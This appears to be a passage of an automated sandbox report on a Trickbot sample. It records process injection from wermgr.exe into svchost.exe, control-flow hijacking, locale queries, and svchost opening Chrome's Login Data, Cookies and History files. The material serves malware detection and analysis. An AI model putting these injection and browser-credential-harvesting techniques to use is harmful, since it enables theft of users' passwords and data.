Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FFC0000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 199302D0000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 180001000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 180001000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 18009D000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 18009D000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1800B9000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1800B9000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1800BE000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1800BE000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 19931AF0000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 19931B00000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 19931B10000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FFC0000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 19931AF0000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 19931B10000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 19931B30000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 19931B40000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 19931B60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FFC0000 Jump to behavior
Hijacks the control flow in another process
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Memory written: PID: 5016 base: 1767ECB0000 value: FF Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: PID: 1728 base: 180001000 value: E9 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: PID: 1728 base: 1800B9000 value: FF Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe Jump to behavior
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe Jump to behavior
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe Jump to behavior
Source: wermgr.exe, 00000003.00000002.14249801662.0000017600001000.00000002.00020000.sdmp Binary or memory string: uProgram Manager
Source: wermgr.exe, 00000003.00000002.14249801662.0000017600001000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: wermgr.exe, 00000003.00000002.14249801662.0000017600001000.00000002.00020000.sdmp Binary or memory string: Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wermgr.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: GetLocaleInfoA, 1_2_0074A134
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: EnumSystemLocalesA, 1_2_0074A1F6
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: EnumSystemLocalesA, 1_2_0074A220
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA, 1_2_0074A2C3
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: EnumSystemLocalesA, 1_2_0074A287
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte, 1_2_00757650
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: GetLastError,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 1_2_007486AD
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: GetLocaleInfoA, 1_2_00741742
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: GetLocaleInfoA, 1_2_00757918
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 1_2_00749D6C
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: GetLocaleInfoA, 1_2_00749E61
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA, 1_2_00749F63
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: GetLocaleInfoW, 1_2_00749F08
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_00747022 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 1_2_00747022

Stealing of Sensitive Information:

barindex
Yara detected Trickbot
Source: Yara match File source: Process Memory Space: wermgr.exe PID: 5016, type: MEMORYSTR
Source: Yara match File source: 00000001.00000002.9279032092.0000000002881000.00000040.00000001.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak Jump to behavior
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History.bak Jump to behavior
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies.bak Jump to behavior
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak Jump to behavior
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior

Remote Access Functionality:

barindex
Yara detected Trickbot
Source: Yara match File source: Process Memory Space: wermgr.exe PID: 5016, type: MEMORYSTR
Source: Yara match File source: 00000001.00000002.9279032092.0000000002881000.00000040.00000001.sdmp, type: MEMORY